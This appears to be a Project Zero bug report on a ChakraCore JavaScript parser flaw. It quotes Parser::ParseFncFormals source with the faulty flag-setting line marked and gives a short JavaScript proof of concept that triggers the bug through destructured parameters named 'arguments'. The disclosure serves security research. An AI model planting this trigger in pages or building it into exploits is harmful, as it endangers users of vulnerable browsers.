<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1298
Similar to theissue #1297 . But this time, it happends in "Parser::ParseFncFormals" with the "PNodeFlags::fpnArguments_overriddenInParam" flag.
template<bool buildAST>
void Parser::ParseFncFormals(ParseNodePtr pnodeFnc, ParseNodePtr pnodeParentFnc, ushort flags){...if(IsES6DestructuringEnabled() && IsPossiblePatternStart()){...// Instead of passing the STFormal all the way on many methods, it seems it is better to change the symbol type afterward.for(ParseNodePtr lexNode = *ppNodeLex; lexNode != nullptr; lexNode = lexNode->sxVar.pnodeNext){
Assert(lexNode->IsVarLetOrConst());
UpdateOrCheckForDuplicateInFormals(lexNode->sxVar.pid, &formals);
lexNode->sxVar.sym->SetSymbolType(STFormal);if(m_currentNodeFunc != nullptr && lexNode->sxVar.pid == wellKnownPropertyPids.arguments){
m_currentNodeFunc->grfpn |= PNodeFlags::fpnArguments_overriddenInParam;<<------ HERE
}}......}
PoC:
-->
function f(){({a = ([arguments]) => {}} = 1);
arguments.x;}
f();
